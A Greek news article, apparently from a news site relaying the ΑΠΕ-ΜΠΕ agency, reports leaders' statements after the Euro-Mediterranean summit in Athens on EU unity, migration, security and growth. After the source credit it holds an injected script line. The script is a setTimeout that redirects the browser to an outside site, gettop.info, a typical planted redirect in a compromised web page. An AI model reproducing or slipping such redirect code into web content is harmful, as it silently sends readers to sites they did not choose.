Ευρωμεσογειακή Σύνοδος: Κοινή βούληση για ενίσχυση της συνοχής της Ευρώπης- Όλες οι δηλώσεις

0
23

 

Δεν είμαστε, ούτε επιθυμούμε να γίνουμε άλλη μία πρωτοβουλία διχασμού της Ευρώπης, αλλά μία πρωτοβουλία διαλόγου που θα συνεισφέρει στην ενότητα της Ε.Ε. Φιλοδοξούμε να συμβάλουμε στη συζήτηση για ένα νέο όραμα για την Ε.E. που θα εμπνέει τους λαούς της» ανέφερε ο πρωθυπουργός Αλέξης Τσίπρας, στην κοινή συνέντευξη Τύπου μετά το πέρας της Συνόδου των Μεσογειακών Χωρών.

summit1

Όπως έκανε γνωστό, η επόμενη συνάντηση θα γίνει στην Πορτογαλία.
Κατά την κοινή συνέντευξη Τύπου των ηγετών των Μεσογειακών χωρών της Ε.Ε., ο Πρωθυπουργός τους ευχαρίστησε που ήρθαν στην Αθήνα, χαρακτηρίζοντας ως σημαντικότερο γεγονός την πραγματοποίηση της Συνόδου.

tsipras

Υπογράμμισε ότι η ενότητα περνάει μέσα από τη σύγκλιση και μέσα από την καταπολέμηση των ανισοτήτων, ενώ σημείωσε ότι οι ηγέτες των χωρών της Μεσογείου κατέληξαν σε ένα κοινό κείμενο, τη διακήρυξη των Αθηνών. Προανήγγειλε δε ότι η επόμενη συνάντηση θα λάβει χώρα στην Πορτογαλία.

«Από τη μία άκρη της Μεσογείου στην άλλη άκρη σε μία χώρα που βρέχεται από τον ατλαντικό αλλά έχει τα ίδια προβλήματα», όπως εξήγησε.

summit

Όπως είπε, «η Σύνοδος αναδεικνύει την κοινή μας βούληση να ενισχύσουμε τη συνοχή και την ενότητα της Ευρώπης, συμμετέχοντας ενεργά στον διάλογο για το μέλλον της Ε.Ε., που ξεκινά σε λίγες ημέρες από τη Μπρατισλάβα».
Ο Πρωθυπουργός επανέλαβε ότι η Ε.Ε. χρειάζεται νέο όραμα, για να εμπνεύσει εκ νέου τους λαούς της, ενώ επέμεινε ότι αυτό δεν μπορεί να γίνει μόνο με ευχές, αλλά χρειάζονται μέτρα.

Ο κ. Τσίπρας στάθηκε στην ανάγκη λήψης μέτρων που θα ενισχύσουν την ανάπτυξη, την απασχόληση και την ασφάλεια, δυναμικών πρωτοβουλιών για την υπεράσπιση της ειρήνης στην ευρύτερη περιοχή, αλλά και ανθρώπινης αντιμετώπισης των μεταναστευτικών ροών.
«Αυτή η σύνοδος η πρωτοβουλία είναι μία θετική συμβολή στο διάλογο για το μέλλον της Ευρώπης», είπε επίσης ο Πρωθυπουργός.

Μήνυμα συνοχής θέλησε να στείλει ο Γάλλος πρόεδρος Φρανσουά Ολάντ εκ μέρους των ηγετών των μεσογειακών ευρωπαϊκών χωρών, στη συνέντευξή Τύπου μετά το πέρας της ευρωμεσογειακής συνόδου.

«Θέλουμε να στείλουμε ένα μήνυμα συνοχής και να συμβάλλουμε, να συνεισφέρουμε η Νότια Ευρώπη στην Ε.Ε.», ανέφερε, εν όψει της άτυπης συνόδου κορυφής στη Μπρατισλάβα.

Ο κ. Ολάντ αναφέρθηκε σε δύο βασικές πεποιθήσεις: ότι στην τωρινή συγκυρία χρειάζεται ενότητα και συνοχή για να δοθεί ελπίδα στην Ευρώπη και ότι οι χώρες της Μεσογείου μπορούν να συμβάλουν στην έναρξη μιας συνεργασίας, ενός διαλόγου και δράσεων που θα είναι χρήσιμα στην Ευρώπη, ως προς τη σταθερότητα την ασφάλεια και την οικονομία της.

Ειδικά για το προσφυγικό ζήτημα ο Γάλλος πρόεδρος είπε ότι οι χώρες του Νότου θέλουν να συμβάλουν με τις δικές τους σκέψεις και τα δικά τους συμπεράσματα στο τι πρέπει να γίνει στα θέματα της ασφάλειας και της μετανάστευσης.

Τόνισε την ανάγκη να χαραχτούν πολιτικές συνοχής και να σταλεί ένα μήνυμα πολιτισμού και ένα μήνυμα κατανόησης σε σχέση με τα δεινά που αντιμετωπίζουν οι λαοί κοντά στην Ε.Ε.

Αναστασιάδης: Η Σύνοδος δεν αποτελεί προσπάθεια ομαδοποιήσεων

Ξεκάθαρο μήνυμα ότι η ευρωμεσογειακή Σύνοδος δεν αποτελεί προσπάθεια ομαδοποιήσεων έστειλε ο πρόεδρος της Κυπριακής Δημοκρατίας Νίκος Αναστασιάδης, τονίζοντας ότι οι συζητήσεις που έγιναν στο πλαίσιό της θα συνεισφέρουν εποικοδομητικά στον διάλογο για το μέλλον της Ευρώπης.
«Μέσα από σωρεία προκλήσεων που αντιμετωπίζουν οι χώρες της νότιας Ε.Ε. μπορούν να συνεισφέρουν τα μέγιστα λόγω της εμπειρίας τους» ανέφερε και πρόσθεσε ότι όποια ομαδοποίηση «θα αποτελούσε τη χειρίστη συνεισφορά στην αλληλεγγύη της Ε.Ε.».
Απηύθυνε κάλεσμα για ουσιαστικές και συγκεκριμένες αποφάσεις «για να αντιμετωπίσουμε τα αίτια αποξένωσης των πολιτικών που χαράσσονται στην Ε.Ε.».
«Οφείλουμε να αντιμετωπίσουμε το θέμα της ασφάλειας, του προσφυγικού και της ανάπτυξης λαμβάνοντας υπ’ όψιν τη συζήτηση και τη διακήρυξη που έγινε σήμερα» τόνισε.

Ρέντσι: Η Ευρώπη να βασίζεται στις βαθύτερες αξίες της

Στην ανάγκη «η Ευρώπη να βασίζεται στις βαθύτερες αξίες της» στάθηκε ο Ιταλός πρωθυπουργός Ματέο Ρέντσι, στις δηλώσεις του μετά το πέρας της Ευρωμεσογειακής Συνόδου.

Όπως τόνισε ο Ιταλός πρωθυπουργός, η πραγματική πρόκληση αυτής της συνάντησης «είναι να σκιαγραφήσουμε το μέλλον μας, να προετοιμαστούμε για τη Σύνοδο της Μπρατισλάβας. Να πούμε ότι η Ε.Ε. μπορεί να φτάσει στον καλύτερό της εαυτό ως προς τις αξίες, τον πολιτισμό».

Ο κ. Ρέντσι σημείωσε ότι η Ε.Ε. δεν μπορεί να συνεχίσει να βασίζεται μόνο στη λιτότητα, σε κανόνες και τεχνοκράτες.
«Η αυριανή Ευρώπη πρέπει να βασίζεται στην κοινωνική Ευρώπη και την Ευρώπη των ιδεωδών» είπε και πρόσθεσε ότι η Διακήρυξη των Αθηνών είναι προστιθέμενη αξία για μια διαφορετική Ευρώπη από αυτή που γνωρίσαμε έως σήμερα.

Κόστα: Βλέπουμε την Ευρώπη ως ολότητα
«Βλέπουμε την Ευρώπη ως ολότητα», δήλωσε ο Πορτογάλος πρωθυπουργός Αντόνιο Κόστα, μετά τη Σύνοδο των ηγετών των μεσογειακών χωρών της Ε.Ε..

Τόνισε την ανάγκη η Ε.Ε. να εστιάσει στην καινοτομία και σε πολιτικές επενδύσεων που θα οδηγήσουν σε απασχόληση και σε ανάπτυξη.

«Οι πολίτες θα πρέπει να βλέπουν το μέλλον με ελπίδα ιδιαίτερα οι νέοι που δεν βλεπουν προοπτικές απασχόλησης», πρόσθεσε.

Ως προς την προσφυγική κρίση, ο κ. Κόστα τόνισε ότι διατρανώνει τη θέληση των κρατών – μελών του Νότου να υποστηρίξουν την αλληλεγγύη τους ως προς τα εξωτερικά σύνορα της Ε.Ε..

Τάχθηκε υπέρ του καταμερισμού ευθυνών, ως προς την υποδοχή προσφύγων στην Ε.Ε., τόνισε ότι η κατανομή τους πρέπει να γίνεται με δίκαιο τρόπο και ότι χρειάζεται αλληλεγγύη.

Μούσκατ: Ανάγκη για κοινωνική Ευρώπη

«Είχα την εντύπωση ότι θα είχαμε μία σύνοδο κορυφής προβλημάτων αντίθετα καταλήξαμε σε σύνοδο κορυφής λύσεων. Καταλήξαμε σε προτάσεις» ανέφερε ο πρωθυπουργός της Μάλτας Τζόζεφ Μούσκατ κατά τις δηλώσεις του μετά το πέρας της ευρωμεσογειακής Συνόδου.

Εξέφρασε την πεποίθηση ότι αυτό το φόρουμ θα αποτελέσει τακτικό σημείο αναφοράς.
Στάθηκε ιδιαίτερα σε τρία σημεία που προέκυψαν από τη Σύνοδο και όπως είπε είναι:
Στήριξη που προσφέρουμε στην Κομισιόν και στο σχέδιο Γιούνκερ. Στηρίζουμε Κομισιόν για διπλασιασμό πόρων για το σχέδιο Γιούνκερ.

Το τωρινό σύστημα αντιμετώπισης της μετανάστευσης δεν είναι αποτελεσματικό, το Δουβλίνο δεν συμβαδίζει με την πραγματικότητα πρέπει να το αντιμετωπίσουμε.

Πρώτη φορά εδώ και πολλούς μήνες μία ομάδα χωρών τονίζει την ανάγκη για κοινωνική Ευρώπη. Μία φράση που ξεχάστηκε και αφαιρέθηκε από το ευρωπαϊκό λεξικό. Να επανέλθει η Ε.Ε. για να προστατεύσει και την έννοια του κοινωνικού κράτους.

Ισπανός αναπληρωτής υπουργός Ε.Ε.: Να δοθεί ευρωπαϊκή απάντηση στα προβλήματα

Στην ανάγκη να δοθεί μία ευρωπαϊκή απάντηση στα ζητήματα ασφάλειας, μετανάστευσης και οικονομίας, στάθηκε ο αναπληρωτής υπουργός Ευρωπαϊκής Ένωσης της Ισπανίας Φερνάντο Εγκιδάθου, ο οποίος εκπροσώπησε τον υπηρεσιακό πρωθυπουργό της Ισπανίας Μαριάνο Ραχόι στην Ευρωμεσογειακή Σύνοδο.

«Ο Μαριάνο Ραχόι ήθελε να βρεθεί εδώ, ωστόσο δεν στάθηκε δυνατό σε αυτή τη συγκυρία» είπε ο κ. Εγκιδάθου και ευχαρίστησε τον πρωθυπουργό Αλέξη Τσίπρα «για τη σημαντική πρωτοβουλία».

Όπως εξήγησε, στόχος της Συνόδου ήταν να βρεθούν τα σημεία στα οποία υπάρχει σύγκλιση απόψεων, μεταξύ των ευρωπαϊκών χωρών της Μεσόγειο.

Επί τάπητος, όπως εξήγησε, τέθηκαν ζητήματα ασφάλειας και τρομοκρατίας, μετανάστευσης, αλλά και οικονομίας, με έμφαση στην απασχόληση και την ανάπτυξη. «Πρέπει και στα τρία σκέλη να δοθεί ευρωπαϊκή απάντηση», ανέφερε ο Ισπανός υπουργός.
Ο κ. Εγκιδάθου χαρακτήρισε τη σύνοδο σημαντική πρωτοβουλία και τόνισε πως «αποτελούμε αναπόσπαστο μέρος της μεσογειακής θάλασσας και πάντα υποστηρίζουμε τις συναντήσεις αυτές που αντιμετωπίζουν κοινά προβλήματα».

 

πηγή:ΑΠΕ-ΜΠΕ setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here